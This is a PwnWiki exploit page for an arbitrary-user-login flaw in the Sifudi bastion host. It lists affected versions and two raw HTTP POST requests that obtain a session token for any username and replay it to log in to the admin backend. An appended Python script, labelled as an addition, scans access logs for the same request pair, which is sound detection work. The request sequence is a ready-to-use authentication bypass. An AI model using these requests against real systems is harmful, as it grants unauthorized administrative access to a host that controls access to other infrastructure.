Sifudi (思福迪) Bastion Host Arbitrary User Login Vulnerability

From PwnWiki
Revision as of 17:16, 15 April 2021 by Pwnwiki

Affected versions

LogBase-B798

bh-x64-v7.0.15

Exploitation

Obtain the INFO field; the value of the u1 parameter is the username:

POST /bhost/set_session HTTP/1.1
Host: xx.xx.xx.xx

u1=admin&m1=

Response:

{"result":true,"info":"1562205376847","ErrMsg":""}


Substitute the INFO field into the a0 parameter of the following request.

The value of the uCode parameter is the username.

POST /bhost/login_link HTTP/1.1
Host: xx.xx.xx.xx

a0=1562205376847&a1=&a10=2019-01-01+10:10:10&ha=CADFDF26E649FB6284D2FD424BD294B6&uCode=admin&vdcode=

After exploitation, login to the admin backend succeeds.
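
A defensive check for the two-request sequence described above, as an added example that is not part of the original page: it scans web access logs for a POST to /bhost/set_session followed by a POST to /bhost/login_link from the same client within a short window and reports the pair for review. The combined log format, the 60-second window and the sample lines are assumptions constructed for illustration; the page does not say whether normal logins also touch these endpoints, so baseline before alerting.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in common log format (assumed; not from the page).
SAMPLE_LOG = """\
203.0.113.7 - - [15/Apr/2021:10:00:01 +0000] "POST /bhost/set_session HTTP/1.1" 200 52
203.0.113.7 - - [15/Apr/2021:10:00:03 +0000] "POST /bhost/login_link HTTP/1.1" 200 310
198.51.100.4 - - [15/Apr/2021:10:05:00 +0000] "GET /favicon.ico HTTP/1.1" 200 1200
198.51.100.9 - - [15/Apr/2021:11:00:00 +0000] "POST /bhost/set_session HTTP/1.1" 200 52
198.51.100.9 - - [15/Apr/2021:11:30:00 +0000] "POST /bhost/login_link HTTP/1.1" 200 310
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def find_session_link_pairs(log_text, window=timedelta(seconds=60)):
    """Return (client, set_session_time, login_link_time) for each close pair."""
    pending = {}  # client IP -> time of its most recent POST /bhost/set_session
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, ts, method, path, _status = m.groups()
        if method != "POST":
            continue
        when = datetime.strptime(ts, TS_FORMAT)
        path = path.split("?", 1)[0]  # ignore any query string
        if path == "/bhost/set_session":
            pending[ip] = when
        elif path == "/bhost/login_link":
            start = pending.pop(ip, None)
            if start is not None and timedelta(0) <= when - start <= window:
                hits.append((ip, start.isoformat(), when.isoformat()))
    return hits


if __name__ == "__main__":
    for client, first, second in find_session_link_pairs(SAMPLE_LOG):
        print(f"review: {client} set_session at {first}, login_link at {second}")
```
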